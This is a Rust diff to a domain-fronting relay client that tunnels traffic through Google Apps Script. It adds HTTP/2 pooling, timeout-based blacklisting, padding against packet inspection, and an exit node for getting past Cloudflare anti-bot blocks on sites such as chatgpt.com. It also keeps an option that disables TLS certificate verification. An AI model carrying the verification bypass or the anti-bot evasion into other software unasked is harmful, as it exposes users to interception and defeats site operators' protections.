     today_bytes: AtomicU64,
     today_key: std::sync::Mutex<String>,
+    /// Suppress the random `_pad` field that v1.8.0+ adds to outbound
+    /// payloads. Mirrors `Config::disable_padding` (#391). Default false
+    /// (padding active = stronger DPI defense at +25% bandwidth cost).
+    disable_padding: bool,
+    /// Per-instance auto-blacklist tuning. Mirrors `Config::auto_blacklist_*`
+    /// (#391, #444). Cached here so the hot path in `record_timeout_strike`
+    /// doesn't have to reach back through the Config (which we don't keep
+    /// a reference to).
+    auto_blacklist_strikes: u32,
+    auto_blacklist_window: Duration,
+    auto_blacklist_cooldown: Duration,
+    /// Per-batch HTTP timeout. Mirrors `Config::request_timeout_secs`
+    /// (#430, masterking32 PR #25). Read by `tunnel_client::fire_batch`
+    /// so a single config field tunes the timeout used everywhere.
+    batch_timeout: Duration,
+    /// Optional second-hop exit node (Deno Deploy / fly.io / etc.)
+    /// to bypass CF-anti-bot blocks on sites that flag Google datacenter
+    /// IPs (chatgpt.com, claude.ai, grok.com, x.com). Mirrors
+    /// `Config::exit_node`. When `exit_node_enabled` is false (the more
+    /// common state), all relay traffic takes the regular Apps Script
+    /// path. When true, hosts matching `exit_node_hosts` (or all hosts
+    /// when `exit_node_full`) route through the exit-node URL inside
+    /// the Apps Script call.
+    exit_node_enabled: bool,
+    exit_node_url: String,
+    exit_node_psk: String,
+    exit_node_full: bool,
+    /// Pre-normalized (lowercased, leading-dot stripped) host list for
+    /// fast O(N) match in `exit_node_matches`.
+    exit_node_hosts: Vec<String>,
 }
 
 /// Aggregated stats for one remote host.
@@ -146,6 +461,12 @@ impl HostStat {
 
 const BLACKLIST_COOLDOWN_SECS: u64 = 600;
 
+/// Auto-blacklist defaults are now per-instance fields on `DomainFronter`,
+/// driven by `Config::auto_blacklist_strikes` / `_window_secs` /
+/// `_cooldown_secs` (#391, #444). The constants below are gone — see the
+/// `Config` doc comments for tuning guidance and `default_auto_blacklist_*`
+/// for the historical defaults (3 strikes / 30s window / 120s cooldown).
+
 /// Request payload sent to Apps Script (single, non-batch).
 #[derive(Serialize)]
 struct RelayRequest<'a> {
@@ -193,6 +514,8 @@ pub struct TunnelResponse {
     /// `e` only when this is `None` and compatibility is needed.
     #[serde(default)]
     pub code: Option<String>,
+    #[serde(default)]
+    pub seq: Option<u64>,
 }
 
 /// A single op in a batch tunnel request.
@@ -207,6 +530,10 @@ pub struct BatchOp {
     pub port: Option<u16>,
     #[serde(skip_serializing_if = "Option::is_none")]
     pub d: Option<String>,
+    #[serde(skip_serializing_if = "Option::is_none")]
+    pub seq: Option<u64>,
+    #[serde(skip_serializing_if = "Option::is_none")]
+    pub wseq: Option<u64>,
 }
 
 /// Batch tunnel response from Apps Script / tunnel node.
@@ -224,19 +551,43 @@ impl DomainFronter {
         if script_ids.is_empty() {
             return Err(FronterError::Relay("no script_id configured".into()));
         }
-        let tls_config = if config.verify_ssl {
-            let mut roots = rustls::RootCertStore::empty();
-            roots.extend(webpki_roots::TLS_SERVER_ROOTS.iter().cloned());
-            ClientConfig::builder()
-                .with_root_certificates(roots)
-                .with_no_client_auth()
-        } else {
-            ClientConfig::builder()
-                .dangerous()
-                .with_custom_certificate_verifier(Arc::new(NoVerify))
-                .with_no_client_auth()
+        // Helper that builds a fresh ClientConfig with the verifier
+        // policy from config. We need two of these so the h2-capable
+        // and h1-only paths can advertise different ALPN sets without
+        // mutating one shared config across calls.
+        let build_tls_config = || {
+            if config.verify_ssl {
+                let mut roots = rustls::RootCertStore::empty();
+                roots.extend(webpki_roots::TLS_SERVER_ROOTS.iter().cloned());
+                ClientConfig::builder()
+                    .with_root_certificates(roots)
+                    .with_no_client_auth()
+            } else {
+                ClientConfig::builder()
+                    .dangerous()
+                    .with_custom_certificate_verifier(Arc::new(NoVerify))
+                    .with_no_client_auth()
+            }
         };
-        let tls_connector = TlsConnector::from(Arc::new(tls_config));
+
+        // Connector for `open_h2`: advertises h2 first (or just h1 if
+        // the kill switch is set, in which case both connectors end up
+        // identical — fine, just slightly redundant).
+        let mut tls_h2 = build_tls_config();
+        if !config.force_http1 {
+            tls_h2.alpn_protocols = vec![b"h2".to_vec(), b"http/1.1".to_vec()];
+        } else {
+            tls_h2.alpn_protocols = vec![b"http/1.1".to_vec()];
+        }
+        let tls_connector = TlsConnector::from(Arc::new(tls_h2));
+
+        // Connector for `open()` (h1 pool path). ALPN is forced to
+        // http/1.1 so a Google edge that would otherwise prefer h2
+        // still negotiates h1 here — pooled sockets always speak the
+        // protocol the fallback path expects.
+        let mut tls_h1 = build_tls_config();
+        tls_h1.alpn_protocols = vec![b"http/1.1".to_vec()];
+        let tls_connector_h1 = TlsConnector::from(Arc::new(tls_h1));
 
         Ok(Self {
             connect_host: config.google_ip.clone(),
@@ -253,26 +604,102 @@ impl DomainFronter {
             script_ids,
             script_idx: AtomicUsize::new(0),
             tls_connector,
+            tls_connector_h1,
             pool: Arc::new(Mutex::new(Vec::new())),
+            h2_cell: Arc::new(Mutex::new(None)),
+            h2_open_lock: Arc::new(Mutex::new(())),
+            h2_open_failed_at: Arc::new(Mutex::new(None)),
+            h2_generation: Arc::new(AtomicU64::new(0)),
+            h2_disabled: Arc::new(AtomicBool::new(config.force_http1)),
             cache: Arc::new(ResponseCache::with_default()),
             inflight: Arc::new(Mutex::new(HashMap::new())),
             coalesced: AtomicU64::new(0),
             blacklist: Arc::new(std::sync::Mutex::new(HashMap::new())),
+            script_timeouts: Arc::new(std::sync::Mutex::new(HashMap::new())),
             relay_calls: AtomicU64::new(0),
             relay_failures: AtomicU64::new(0),
             bytes_relayed: AtomicU64::new(0),
+            h2_calls: AtomicU64::new(0),
+            h2_fallbacks: AtomicU64::new(0),
             per_site: Arc::new(std::sync::Mutex::new(HashMap::new())),
             today_calls: AtomicU64::new(0),
             today_bytes: AtomicU64::new(0),
-            today_key: std::sync::Mutex::new(current_utc_day_key()),
+            today_key: std::sync::Mutex::new(current_pt_day_key()),
+            disable_padding: config.disable_padding,
+            auto_blacklist_strikes: config.auto_blacklist_strikes.max(1),
+            auto_blacklist_window: Duration::from_secs(
+                config.auto_blacklist_window_secs.clamp(1, 3600),
+            ),
+            auto_blacklist_cooldown: Duration::from_secs(
+                config.auto_blacklist_cooldown_secs.clamp(1, 86400),
+            ),
+            batch_timeout: Duration::from_secs(
+                config.request_timeout_secs.clamp(5, 300),
+            ),
+            exit_node_enabled: config.exit_node.enabled
+                && !config.exit_node.relay_url.is_empty()
+                && !config.exit_node.psk.is_empty(),
+            exit_node_url: config
+                .exit_node
+                .relay_url
+                .trim_end_matches('/')
+                .to_string(),
+            exit_node_psk: config.exit_node.psk.clone(),
+            exit_node_full: matches!(
+                config.exit_node.mode.to_ascii_lowercase().as_str(),
+                "full"
+            ),
+            exit_node_hosts: config
+                .exit_node
+                .hosts
+                .iter()
+                .map(|h| h.trim().trim_start_matches('.').to_ascii_lowercase())
+                .filter(|h| !h.is_empty())
+                .collect(),
         })
     }
 
+    /// True when the configured exit node should handle this URL.
+    /// In `selective` mode (default), checks the host against the
+    /// pre-normalized `exit_node_hosts` list (exact match OR
+    /// dot-anchored suffix, mirroring `passthrough_hosts` semantics).
+    /// In `full` mode, every URL routes through the exit node.
+    pub(crate) fn exit_node_matches(&self, url: &str) -> bool {
+        if !self.exit_node_enabled {
+            return false;
+        }
+        if self.exit_node_full {
+            return true;
+        }
+        let host = match extract_host(url) {
+            Some(h) => h,
+            None => return false,
+        };
+        let host_lc = host.to_ascii_lowercase();
+        for entry in &self.exit_node_hosts {
+            if host_lc == *entry || host_lc.ends_with(&format!(".{}", entry)) {
+                return true;
+            }
+        }
+        false
+    }
+
+    /// Per-batch HTTP round-trip timeout. Read by `tunnel_client` so the
+    /// `BATCH_TIMEOUT` constant doesn't have to be touched on every config
+    /// change. Clamped to `[5s, 300s]` at construction.
+    pub(crate) fn batch_timeout(&self) -> Duration {
+        self.batch_timeout
+    }
+
     /// Record one relay call toward the daily budget. Called once per
     /// outbound Apps Script fetch. Rolls over both daily counters at
-    /// 00:00 UTC.
-    fn record_today(&self, bytes: u64) {
-        let today = current_utc_day_key();
+    /// 00:00 Pacific Time, matching Apps Script's quota reset cadence
+    /// (#230, #362). Crate-public so the Full-mode batch path in
+    /// `tunnel_client::fire_batch` can wire into the same accounting
+    /// (Apps Script sees Full-mode batches as ordinary `UrlFetchApp`
+    /// calls and counts them against the same daily quota).
+    pub(crate) fn record_today(&self, bytes: u64) {
+        let today = current_pt_day_key();
         // Fast path: same day as what we last saw. No lock.
         let mut guard = self.today_key.lock().unwrap();
         if *guard != today {
@@ -317,8 +744,8 @@ impl DomainFronter {
         // Read today_key under lock and cheaply check rollover so the
         // UI never sees stale "today_calls=1847" on a day where no
         // traffic has flowed yet (e.g. user left the app open past
-        // midnight UTC).
-        let today_now = current_utc_day_key();
+        // midnight PT).
+        let today_now = current_pt_day_key();
         let today_key = {
             let mut guard = self.today_key.lock().unwrap();
             if *guard != today_now {
@@ -341,7 +768,10 @@ impl DomainFronter {
             today_calls: self.today_calls.load(Ordering::Relaxed),
             today_bytes: self.today_bytes.load(Ordering::Relaxed),
             today_key,
-            today_reset_secs: seconds_until_utc_midnight(),
+            today_reset_secs: seconds_until_pacific_midnight(),
+            h2_calls: self.h2_calls.load(Ordering::Relaxed),
+            h2_fallbacks: self.h2_fallbacks.load(Ordering::Relaxed),
+            h2_disabled: self.h2_disabled.load(Ordering::Relaxed),
         }
     }
 
@@ -414,17 +844,67 @@ impl DomainFronter {
     }
 
     fn blacklist_script(&self, script_id: &str, reason: &str) {
-        let until = Instant::now() + Duration::from_secs(BLACKLIST_COOLDOWN_SECS);
+        self.blacklist_script_for(
+            script_id,
+            Duration::from_secs(BLACKLIST_COOLDOWN_SECS),
+            reason,
+        );
+    }
+
+    fn blacklist_script_for(&self, script_id: &str, cooldown: Duration, reason: &str) {
+        let until = Instant::now() + cooldown;
         let mut bl = self.blacklist.lock().unwrap();
         bl.insert(script_id.to_string(), until);
         tracing::warn!(
             "blacklisted script {} for {}s: {}",
             mask_script_id(script_id),
-            BLACKLIST_COOLDOWN_SECS,
+            cooldown.as_secs(),
             reason
         );
     }
 
+    /// Record a batch timeout against `script_id`. After
+    /// `TIMEOUT_STRIKE_LIMIT` timeouts inside `TIMEOUT_STRIKE_WINDOW`
+    /// the deployment is blacklisted with a short cooldown so the
+    /// round-robin stops sending real traffic to a deployment that's
+    /// hung (most commonly: stale `TUNNEL_SERVER_URL` after the
+    /// tunnel-node moved hosts).
+    pub(crate) fn record_timeout_strike(&self, script_id: &str) {
+        let now = Instant::now();
+        let mut counts = self.script_timeouts.lock().unwrap();
+        let entry = counts
+            .entry(script_id.to_string())
+            .or_insert((now, 0));
+        if now.duration_since(entry.0) > self.auto_blacklist_window {
+            *entry = (now, 1);
+        } else {
+            entry.1 += 1;
+        }
+        let strikes = entry.1;
+        if strikes >= self.auto_blacklist_strikes {
+            counts.remove(script_id);
+            drop(counts);
+            self.blacklist_script_for(
+                script_id,
+                self.auto_blacklist_cooldown,
+                &format!(
+                    "{} timeouts in {}s",
+                    strikes,
+                    self.auto_blacklist_window.as_secs()
+                ),
+            );
+        }
+    }
+
+    /// Clear the timeout strike counter for `script_id`. Called after
+    /// a batch succeeds so a recovered deployment doesn't keep stale
+    /// strikes from hours ago — three strikes must occur within one
+    /// real failure burst, not accumulate across unrelated incidents.
+    pub(crate) fn record_batch_success(&self, script_id: &str) {
+        let mut counts = self.script_timeouts.lock().unwrap();
+        counts.remove(script_id);
+    }
+
     /// Log a relay failure with extra guidance on cert-validation cases.
     /// Rate-limited so a flood of identical "UnknownIssuer" errors doesn't
     /// fill the log.
@@ -469,58 +949,220 @@ impl DomainFronter {
     }
 
     async fn open(&self) -> Result<PooledStream, FronterError> {
-        let tcp = TcpStream::connect((self.connect_host.as_str(), 443u16)).await?;
-        let _ = tcp.set_nodelay(true);
-        let sni = self.next_sni();
-        let name = ServerName::try_from(sni)?;
-        let tls = self.tls_connector.connect(name, tcp).await?;
-        Ok(tls)
+        // Bounded TCP+TLS open. See `H1_OPEN_TIMEOUT_SECS`.
+        let work = async {
+            let tcp = TcpStream::connect((self.connect_host.as_str(), 443u16)).await?;
+            let _ = tcp.set_nodelay(true);
+            let sni = self.next_sni();
+            let name = ServerName::try_from(sni)?;
+            // Always use the h1-only connector here — the pool only holds
+            // sockets that the raw HTTP/1.1 fallback path can write to.
+            // Using the shared connector would let some pooled sockets
+            // negotiate h2, which would then misframe every fallback
+            // request that lands on them.
+            let tls = self.tls_connector_h1.connect(name, tcp).await?;
+            Ok::<_, FronterError>(tls)
+        };
+        match tokio::time::timeout(Duration::from_secs(H1_OPEN_TIMEOUT_SECS), work).await {
+            Ok(r) => r,
+            Err(_) => Err(FronterError::Relay(format!(
+                "h1 open timed out after {}s",
+                H1_OPEN_TIMEOUT_SECS
+            ))),
+        }
     }
 
-    /// Open `n` outbound TLS connections in parallel and park them in the
-    /// pool so the first few user requests don't pay the handshake cost.
-    /// Errors are logged but not returned — best-effort.
+    /// Open outbound TLS connections eagerly so the first relay request
+    /// doesn't pay a cold handshake.
+    ///
+    /// h2 and h1 prewarm run in parallel: a request that arrives while
+    /// the h2 handshake is still in flight (or has just hit its 8 s
+    /// timeout) needs a warm h1 socket waiting for it, otherwise the
+    /// h1 fallback path pays a cold handshake on the same slow network
+    /// and the 30 s outer batch budget elapses (#924). v1.9.14 warmed
+    /// h1 unconditionally; v1.9.15 (PR #799) accidentally gated the h1
+    /// prewarm behind `ensure_h2()` so the h1 pool stayed empty during
+    /// the h2 init window.
+    ///
+    /// The spawned h2 handshake races h1[0] — boot fires two TLS
+    /// handshakes back-to-back. The 500 ms stagger only applies between
+    /// h1[i] and h1[i+1] for i ≥ 1, so we don't burst the remaining
+    /// h1[1..n] handshakes at the Google edge simultaneously. Each
+    /// connection gets an 8 s expiry offset so they roll off gradually
+    /// instead of all hitting POOL_TTL_SECS at once. If h2 ends up the
+    /// active fast path, `run_pool_refill` trims the pool back down to
+    /// `POOL_MIN_H2_FALLBACK` on the next tick — the extra warm h1
+    /// sockets just age out naturally instead of being kept alive.
     pub async fn warm(self: &Arc<Self>, n: usize) {
-        let mut set = tokio::task::JoinSet::new();
-        for _ in 0..n {
-            let me = self.clone();
-            set.spawn(async move {
-                match me.open().await {
-                    Ok(s) => Some(PoolEntry {
+        // Spawn the h2 prewarm in parallel so the h1 prewarm loop
+        // below isn't blocked on it. Capturing the join handle lets
+        // us still log "h2 fast path active" / "h1 fallback only"
+        // accurately at the end.
+        let h2_self = self.clone();
+        let h2_handle = tokio::spawn(async move {
+            !h2_self.h2_disabled.load(Ordering::Relaxed)
+                && h2_self.ensure_h2().await.is_some()
+        });
+
+        let mut warmed = 0usize;
+        for i in 0..n {
+            if i > 0 {
+                tokio::time::sleep(Duration::from_millis(500)).await;
+            }
+            match self.open().await {
+                Ok(s) => {
+                    let entry = PoolEntry {
                         stream: s,
-                        created: Instant::now(),
-                    }),
-                    Err(e) => {
-                        tracing::debug!("pool warm: open failed: {}", e);
-                        None
+                        created: Instant::now() - Duration::from_secs(8 * i as u64),
+                    };
+                    let mut pool = self.pool.lock().await;
+                    if pool.len() < POOL_MAX {
+                        pool.push(entry);
+                        warmed += 1;
                     }
                 }
-            });
+                Err(e) => {
+                    tracing::debug!("pool warm: open failed: {}", e);
+                }
+            }
+        }
+        // Join the h2 prewarm here only to log whether it landed; the
+        // h1 pool above is already populated either way. A panic in
+        // the spawned task surfaces as `JoinError` — log it explicitly
+        // so it isn't indistinguishable from a clean ALPN refusal.
+        let h2_alive = match h2_handle.await {
+            Ok(v) => v,
+            Err(e) => {
+                tracing::warn!("h2 prewarm task failed to join: {}", e);
+                false
+            }
+        };
+        if h2_alive {
+            tracing::info!(
+                "h2 fast path active; h1 fallback pool pre-warmed with {} connection(s)",
+                warmed
+            );
+        } else if warmed > 0 {
+            tracing::info!("pool pre-warmed with {} connection(s)", warmed);
         }
-        let mut warmed = 0;
-        while let Some(res) = set.join_next().await {
-            if let Ok(Some(entry)) = res {
+    }
+
+    /// Background loop that keeps the h1 pool warm.
+    ///
+    /// Always maintains `POOL_MIN` (8) connections. Full-tunnel mode
+    /// uses the h1 pool for all batch traffic (h2 is skipped for
+    /// tunnel batches), so the pool must stay at full capacity
+    /// regardless of h2 status. Relay mode also benefits from a warm
+    /// pool as h1 fallback.
+    ///
+    /// A connection only counts toward the minimum if it has at least
+    /// 20 s of TTL remaining — nearly-expired entries don't help.
+    /// Checks every `POOL_REFILL_INTERVAL_SECS`, evicts expired entries,
+    /// and opens replacements one at a time so there's no burst.
+    pub async fn run_pool_refill(self: Arc<Self>) {
+        const MIN_REMAINING_SECS: u64 = 20;
+        loop {
+            tokio::time::sleep(Duration::from_secs(POOL_REFILL_INTERVAL_SECS)).await;
+
+            // Evict expired entries first.
+            {
                 let mut pool = self.pool.lock().await;
-                if pool.len() < POOL_MAX {
-                    pool.push(entry);
-                    warmed += 1;
+                pool.retain(|e| e.created.elapsed().as_secs() < POOL_TTL_SECS);
+            }
+
+            let target = POOL_MIN;
+
+            // Count only connections with enough life left.
+            // Refill one at a time to avoid bursting TLS handshakes.
+            loop {
+                let healthy = {
+                    let pool = self.pool.lock().await;
+                    pool.iter()
+                        .filter(|e| {
+                            let age = e.created.elapsed().as_secs();
+                            age + MIN_REMAINING_SECS < POOL_TTL_SECS
+                        })
+                        .count()
+                };
+                if healthy >= target {
+                    break;
+                }
+                match self.open().await {
+                    Ok(s) => {
+                        let mut pool = self.pool.lock().await;
+                        if pool.len() < POOL_MAX {
+                            pool.push(PoolEntry {
+                                stream: s,
+                                created: Instant::now(),
+                            });
+                        }
+                    }
+                    Err(e) => {
+                        tracing::debug!("pool refill: open failed: {}", e);
+                        break;
+                    }
                 }
             }
         }
-        if warmed > 0 {
-            tracing::info!("pool pre-warmed with {} connection(s)", warmed);
+    }
+
+    /// Keep the Apps Script container warm with a periodic HEAD ping.
+    ///
+    /// The TCP/TLS pool stays warm via `run_pool_refill`, but the V8
+    /// container Apps Script runs in goes cold ~5min after the last
+    /// `UrlFetchApp` call and costs 1-3s to spin back up. The symptom
+    /// is "first request after a quiet period stalls" — most visible
+    /// on YouTube where the player gives up on a 1.5s `googlevideo.com`
+    /// chunk that's actually waiting on a cold-start.
+    ///
+    /// Transport-agnostic: the underlying call goes through the same
+    /// `relay_uncoalesced` path everything else uses, so when h2 is
+    /// up the keepalive rides the multiplexed connection too.
+    ///
+    /// Bypasses the response cache (`cache_key_opt = None`) and the
+    /// inflight coalescer — otherwise the second iteration would just
+    /// hit the cached response from the first and never reach Apps
+    /// Script. The relay payload itself is the cheapest non-error one
+    /// we can build: a HEAD against `http://example.com/` returns a few
+    /// hundred bytes, no body decode, no auth.
+    ///
+    /// Best-effort. Failures are debug-logged so a flaky network or
+    /// quota-exhausted account doesn't spam warnings every 4 minutes.
+    /// Loops forever — caller is expected to drop the JoinHandle on
+    /// shutdown (the task lives as long as the process).
+    pub async fn run_keepalive(self: Arc<Self>) {
+        loop {
+            tokio::time::sleep(Duration::from_secs(H1_KEEPALIVE_INTERVAL_SECS)).await;
+            let t0 = Instant::now();
+            // relay_uncoalesced returns Vec<u8> (always — errors are
+            // baked into 5xx responses), so just observe the duration
+            // for the debug line. We intentionally don't use relay()
+            // here because that path goes through the cache + coalesce
+            // layer, which would short-circuit subsequent pings.
+            let _ = self
+                .relay_uncoalesced("HEAD", "http://example.com/", &[], &[], None)
+                .await;
+            tracing::debug!(
+                "container keepalive: {}ms",
+                t0.elapsed().as_millis()
+            );
         }
     }
 
     async fn acquire(&self) -> Result<PoolEntry, FronterError> {
         {
             let mut pool = self.pool.lock().await;
-            while let Some(entry) = pool.pop() {
-                if entry.created.elapsed().as_secs() < POOL_TTL_SECS {
-                    return Ok(entry);
-                }
-                // expired — drop it
-                drop(entry);
+            // Evict expired, then hand out the freshest (most remaining TTL).
+            pool.retain(|e| e.created.elapsed().as_secs() < POOL_TTL_SECS);
+            if !pool.is_empty() {
+                // Freshest = smallest elapsed time. swap_remove is O(1).
+                let freshest = pool
+                    .iter()
+                    .enumerate()
+                    .min_by_key(|(_, e)| e.created.elapsed())
+                    .map(|(i, _)| i)
+                    .unwrap();
+                return Ok(pool.swap_remove(freshest));
             }
         }
         let stream = self.open().await?;
@@ -540,6 +1182,556 @@ impl DomainFronter {
         }
     }
 
+    /// Return a cloned `SendRequest` handle (paired with its cell
+    /// generation) to the active HTTP/2 connection, opening a new one
+    /// if needed. `None` means the h2 fast path is unavailable for
+    /// this call — the caller should fall through to the h1 path.
+    ///
+    /// Reasons we may return `None`:
+    ///   - `force_http1` set, or peer previously refused h2 via ALPN
+    ///     (sticky `h2_disabled`).
+    ///   - We're inside the `H2_OPEN_FAILURE_BACKOFF_SECS` cooldown
+    ///     after a recent open failure.
+    ///   - Another task is currently opening a connection and we
+    ///     don't want to pile on (`try_lock` on `h2_open_lock`).
+    ///   - The open we just attempted timed out within
+    ///     `H2_OPEN_TIMEOUT_SECS` or otherwise failed.
+    ///
+    /// The lock on `h2_cell` is *never* held across network I/O —
+    /// that's the whole point of `h2_open_lock`. Concurrent first-time
+    /// callers compete for `h2_open_lock` via `try_lock`; the loser
+    /// returns None immediately and uses h1 rather than serializing
+    /// behind a slow handshake.
+    ///
+    /// The returned generation lets the caller later
+    /// `poison_h2_if_gen(gen)` to clear *only* this specific cell on
+    /// per-stream error, avoiding the race where a stale failure
+    /// clobbers a freshly-reopened healthy cell.
+    async fn ensure_h2(&self) -> Option<(h2::client::SendRequest<Bytes>, u64)> {
+        if self.h2_disabled.load(Ordering::Relaxed) {
+            return None;
+        }
+
+        // Fast path: existing cell, within TTL and not flagged dead by
+        // the connection driver. We can't peek at SendRequest liveness
+        // synchronously (h2 0.4 doesn't expose `is_closed`), but the
+        // driver task does flip `dead` when the underlying connection
+        // ends — so a known-dead cell is rejected here without paying
+        // a wasted h2 round trip to discover it.
+        {
+            let cell = self.h2_cell.lock().await;
+            if let Some(c) = cell.as_ref() {
+                if c.created.elapsed().as_secs() < H2_CONN_TTL_SECS
+                    && !c.dead.load(Ordering::Relaxed)
+                {
+                    return Some((c.send.clone(), c.generation));
+                }
+            }
+        }
+
+        // Backoff check — recent open failure means h2 is currently
+        // unhealthy; don't pile on retries until the window expires.
+        {
+            let last = self.h2_open_failed_at.lock().await;
+            if let Some(t) = *last {
+                if t.elapsed().as_secs() < H2_OPEN_FAILURE_BACKOFF_SECS {
+                    return None;
+                }
+            }
+        }
+
+        // Open dedup: only one task does the actual handshake at a
+        // time. Concurrent callers see the lock contended and fall
+        // through to h1 immediately — preserves cold-start latency
+        // for the burst that arrives during a slow open.
+        let _open_guard = match self.h2_open_lock.try_lock() {
+            Ok(g) => g,
+            Err(_) => return None,
+        };
+
+        // Re-check the cell under open_lock — another task may have
+        // just stored a fresh connection while we were arbitrating.
+        {
+            let cell = self.h2_cell.lock().await;
+            if let Some(c) = cell.as_ref() {
+                if c.created.elapsed().as_secs() < H2_CONN_TTL_SECS
+                    && !c.dead.load(Ordering::Relaxed)
+                {
+                    return Some((c.send.clone(), c.generation));
+                }
+            }
+        }
+
+        // Bounded handshake. A blackholed connect target can stall
+        // for many seconds otherwise, eating the outer budget that
+        // should be reserved for an h1 fallback round-trip.
+        let open_result =
+            tokio::time::timeout(Duration::from_secs(H2_OPEN_TIMEOUT_SECS), self.open_h2())
+                .await;
+
+        let (send, dead) = match open_result {
+            Ok(Ok(pair)) => pair,
+            Ok(Err(OpenH2Error::AlpnRefused)) => {
+                // Definitive: this peer doesn't speak h2. Sticky-disable
+                // so we never re-attempt the handshake.
+                self.h2_disabled.store(true, Ordering::Relaxed);
+                tracing::info!(
+                    "relay peer refused h2 via ALPN; staying on http/1.1"
+                );
+                *self.h2_cell.lock().await = None;
+                return None;
+            }
+            Ok(Err(e)) => {
+                tracing::debug!("h2 open failed: {} — falling back to h1", e);
+                *self.h2_open_failed_at.lock().await = Some(Instant::now());
+                *self.h2_cell.lock().await = None;
+                return None;
+            }
+            Err(_) => {
+                tracing::debug!(
+                    "h2 open timed out after {}s — falling back to h1",
+                    H2_OPEN_TIMEOUT_SECS
+                );
+                *self.h2_open_failed_at.lock().await = Some(Instant::now());
+                *self.h2_cell.lock().await = None;
+                return None;
+            }
+        };
+
+        // Open succeeded. Tag with a fresh generation, store, return.
+        // Clear any stale backoff timestamp.
+        let generation = self.h2_generation.fetch_add(1, Ordering::Relaxed) + 1;
+        *self.h2_open_failed_at.lock().await = None;
+        let mut cell = self.h2_cell.lock().await;
+        *cell = Some(H2Cell {
+            send: send.clone(),
+            created: Instant::now(),
+            generation,
+            dead,
+        });
+        Some((send, generation))
+    }
+
+    /// Open one TLS connection and run the h2 handshake. Returns a
+    /// typed `OpenH2Error` so the caller can recognize ALPN refusal
+    /// (sticky disable) without string-matching across boundaries.
+    /// The returned `Arc<AtomicBool>` is the death flag the connection
+    /// driver flips when the h2 `Connection` future ends.
+    async fn open_h2(
+        &self,
+    ) -> Result<(h2::client::SendRequest<Bytes>, Arc<AtomicBool>), OpenH2Error> {
+        let tcp = TcpStream::connect((self.connect_host.as_str(), 443u16)).await?;
+        let _ = tcp.set_nodelay(true);
+        let sni = self.next_sni();
+        let name = ServerName::try_from(sni)?;
+        let tls = self.tls_connector.connect(name, tcp).await?;
+        Self::h2_handshake_post_tls(tls).await
+    }
+
+    /// Post-TLS portion of the h2 open path: ALPN check + h2 handshake
+    /// + connection-driver task spawn. Split out from `open_h2` so
+    /// tests can drive it with a TLS stream from any local server,
+    /// bypassing the hard-coded `connect_host:443` target.
+    async fn h2_handshake_post_tls(
+        tls: PooledStream,
+    ) -> Result<(h2::client::SendRequest<Bytes>, Arc<AtomicBool>), OpenH2Error> {
+        let alpn_h2 = tls
+            .get_ref()
+            .1
+            .alpn_protocol()
+            .map(|p| p == b"h2")
+            .unwrap_or(false);
+        if !alpn_h2 {
+            return Err(OpenH2Error::AlpnRefused);
+        }
+        // Larger initial windows mean we don't have to call
+        // `release_capacity` on every chunk for typical Apps Script
+        // payloads (usually < 1 MB; range chunks are 256 KB). We still
+        // release capacity in the body-read loop for safety on larger
+        // bodies.
+        let (send, conn) = h2::client::Builder::new()
+            .initial_window_size(4 * 1024 * 1024)
+            .initial_connection_window_size(8 * 1024 * 1024)
+            .handshake(tls)
+            .await
+            .map_err(|e| OpenH2Error::Handshake(e.to_string()))?;
+        // The connection task drives frame I/O independently of any
+        // SendRequest handle. When it ends (GOAWAY, network error, TTL),
+        // we flip the `dead` flag so `ensure_h2` and `run_pool_refill`
+        // can react within one refill tick instead of waiting for a
+        // request to discover the breakage via `ready()` failure.
+        let dead = Arc::new(AtomicBool::new(false));
+        let dead_for_driver = dead.clone();
+        tokio::spawn(async move {
+            if let Err(e) = conn.await {
+                tracing::debug!("h2 connection closed: {}", e);
+            }
+            dead_for_driver.store(true, Ordering::Relaxed);
+        });
+        tracing::info!("h2 connection established to relay edge");
+        Ok((send, dead))
+    }
+
+    /// React to an h2-fronting-incompatibility HTTP response (status
+    /// matched by `is_h2_fronting_refusal_status`) by:
+    ///   * sticky-disabling the h2 fast path so subsequent calls go
+    ///     straight to h1 without re-paying the handshake / refusal,
+    ///   * clearing any current cell so the SendRequest is dropped,
+    ///   * rebalancing the h2 stat counters so this request shows
+    ///     up as a fallback, not a successful h2 call. (The
+    ///     `run_h2_relay_with_send` Ok path bumps `h2_calls` for any
+    ///     completed round-trip; for a 421 we want it counted as
+    ///     `h2_fallbacks` instead since the request will take the
+    ///     h1 path.)
+    /// Logs at info because this is a meaningful state transition for
+    /// the deployment, not a per-request hiccup.
+    async fn sticky_disable_h2_for_fronting_refusal(&self, status: u16, context: &str) {
+        if !self.h2_disabled.swap(true, Ordering::Relaxed) {
+            tracing::info!(
+                "h2 returned HTTP {} for {} — likely :authority/SNI mismatch via \
+                 domain fronting. Disabling h2 fast path for this fronter and \
+                 falling back to http/1.1.",
+                status,
+                context,
+            );
+        }
+        *self.h2_cell.lock().await = None;
+        // Reclassify: undo the h2_calls increment from
+        // run_h2_relay_with_send and bill this attempt as a fallback.
+        // saturating_sub-style guard: only decrement if non-zero so a
+        // direct caller of this helper from a non-Ok path can't
+        // underflow the counter.
+        let _ = self.h2_calls.fetch_update(
+            Ordering::Relaxed,
+            Ordering::Relaxed,
+            |c| if c > 0 { Some(c - 1) } else { None },
+        );
+        self.h2_fallbacks.fetch_add(1, Ordering::Relaxed);
+    }
+
+    /// Clear the h2 cell *only if* its generation matches the one the
+    /// caller observed. Prevents the race where:
+    ///   1. Task A holds SendRequest from generation N
+    ///   2. Generation N's connection dies; Task B reopens → cell now
+    ///      holds generation N+1 (healthy)
+    ///   3. Task A's stale stream errors → unconditionally clearing
+    ///      the cell would kill the healthy N+1
+    /// With generation matching, A's poison is a no-op against N+1.
+    async fn poison_h2_if_gen(&self, generation: u64) {
+        let mut cell = self.h2_cell.lock().await;
+        if let Some(c) = cell.as_ref() {
+            if c.generation == generation {
+                *cell = None;
+            }
+        }
+    }
+
+    /// Send one POST through the active h2 connection, follow up to 5
+    /// redirects, and return `(status, headers, body)` — the same shape
+    /// the h1 path's `read_http_response` produces, so callers can stay
+    /// transport-agnostic from this point on.
+    ///
+    /// `path` is the HTTP path including the leading slash. The Host /
+    /// :authority header is taken from `self.http_host` for the initial
+    /// request and from the `Location` URL on redirect. `payload` is the
+    /// body bytes; `content_type` is set when non-None (for the JSON
+    /// envelope). Empty body + None content_type → GET (used for redirect
+    /// follow-up).
+    /// Run one h2 stream and return `(status, headers, body)`. Errors
+    /// carry a `RequestSent` flag so the caller can distinguish "never
+    /// sent" (safe to retry on h1) from "may have been processed by
+    /// origin" (only safe to retry for idempotent methods).
+    ///
